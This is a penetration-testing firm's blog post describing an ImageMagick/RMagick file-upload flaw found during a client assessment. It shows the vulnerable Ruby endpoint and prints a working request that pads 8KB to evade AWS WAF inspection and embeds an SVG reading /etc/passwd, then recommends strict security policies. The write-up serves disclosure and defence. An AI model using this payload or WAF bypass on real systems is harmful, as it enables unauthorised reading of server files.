Hack of The Month - January 2023

Developers Hate This One Simple (Image) Magick Trick

Josh Hawking – 27/02/2023

Introduction

ImageMagick is one of those really powerful libraries that always gets mentioned in regards to anything to do with image processing. Sure enough, it’s a case of doing “apt install” and installing the relevant library in whatever programming language is being used. And away you go, you now have support for dozens of image formats and the ability to resize, convert between them, add text, and so on. This is exactly what one of our clients had implemented into their web application, that we assessed in late January.

Features

One of the greatest features of ImageMagick is one of its greatest downfalls too. The support of more than 100 different formats means there’s 100 different attack vectors. And with that, a whole flurry of different vulnerabilities have come out from ImageMagick.

In 2016, ImageTragick saw the release of five different CVEs related to filesystem access from just converting an arbitrary image from one image format to another. In late 2016 and 2018, Tarvis Ormandy showed how it was possible to get remote code execution through the parsing of GhostScript. In 2020, Alex Inführ found RCE through a PDF password parameter. This month, a team at Metabase Q identified a method of local file inclusion when converting PNGs. The list goes on and on…

To their credit, the ImageMagick team are very responsive to these issues and generally addresses any security vulnerabilities quickly.

However, when this incredibly powerful tool is just a simple apt install away, it’s very easy for it to be deployed without much consideration for security. 

Installation

When you install ImageMagick, a particular sentence may stand out to those in the security industry:

Chances are most people completely skip over this line on the download page (especially if you install via a package manager). A security policy within ImageMagick allows developers to configure and limit what file types should be processed by the application. Realistically, most applications probably only intend to support a few file types (such as JPEG, PNG, GIF, etc.) and most security vulnerabilities within ImageMagick relate to obscure or complex  formats (such as GhostScript, SVGs, MVGs, etc.) 

Security Policy?

The web application we assessed allowed users to upload PNGs and JPGs. After being uploaded, we noticed that they were converted to JPEGs. Alarm bells started going off when we noticed that the images were being processed, as we know ImageMagick is a common tool used for this. We noticed that the application checked the MIME type of an uploaded file and that the file extension matched, i.e. the file name had to end in .png or .jpg and specify the image/jpeg or image/png MIME type. Yet, when we modified the request to upload an SVG, the application continued to convert our images like we had uploaded JPGs or PNGs…

It turns out the application utilised RMagick, a Ruby interface for ImageMagick. 

In a default configuration, RMagick will automatically determine the file type of an image from looking at the content of the file, rather than the file name like a developer might expect.

The following Ruby code shows roughly what the endpoint was doing that we exploited:

post ‘/upload’ do
  param :file, String, required: true

  # Check if the filename ends with .png or .jpg
  if !(/\.(png|jpg)$/i.match?(params[:file][:filename]))
    halt 400, json(error: ‘Invalid filename. Must be a PNG or JPG file.’)
  end

  # Check if the MIME type is image/png or image/jpeg
  if !(params[:file][:type] == ‘image/png’ || params[:file][:type] == ‘image/jpeg’)
    halt 400, json(error: ‘Invalid file type. Must be a PNG or JPG file.’)
  end

  # If the file passes both checks, process image with RMagick
  # …
end

All it took was for us to upload a malicious SVG containing a local file inclusion payload, change the extension and MIME type and a lovely image of /etc/passwd was returned to us! (On a side note, did you know AWS WAF only checks the first 8KB of a POST request?)

——WebKitFormBoundary6KiSss4GgOPvCI9D

Content-Disposition: form-data; name=“awswafbypass”; filename=“coolfile.jpg”
Content-Type: image/jpeg

 

AAAAAAAAAA… //8kb of these for bypass——WebKitFormBoundary6KiSss4GgOPvCI9D

Content-Disposition: form-data; name=“file”; filename=“coolfile.jpg”
Content-Type: image/jpeg

<svg width=“1000” height=“1000” xmlns:xlink=“http://www.w3.org/1999/xlink”> xmlns=“http://www.w3.org/2000/svg”>      
<image xlink:href=text:/etc/passwd width=“1000” height=“1000” />
</svg>
——WebKitFormBoundary6KiSss4GgOPvCI9D–

Conclusion

If you use ImageMagick within your web application, make sure you’re using a strict security policy! Security policies will likely block many vulnerabilities related to ImageMagick, limiting the attack surface of your application. Regular web application penetration testing and security consultancy services can vastly help organisations lower the risk of their exposed applications.

Credits

Our client, for allowing us to publish this story.
https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

A Cyber Security Partner You Can Trust

Ruptura InfoSecurity are a UK based cyber security provider. Our services are provided entirely in-house and are fully accredited by industry standard qualifications and standards.

crest_white_cropped
ce_white
GCloud
CCS
cyberessentials_certification mark_BW

Request a Quote

If your organisation requires our services, please get in contact using the form below:

Our Services

Penetration Testing
Red Teaming
Security Consultancy
Need A Security Expert?

Cyber Essentials

Cyber Essentials Basic
Cyber Essentials Plus

About Us

Blog
Twitter

Legal

Cookie Policy
Privacy Policy

© Ruptura InfoSecurity Ltd – 2023. All Rights Reserved. Company Number: 11644559.

Shopping Cart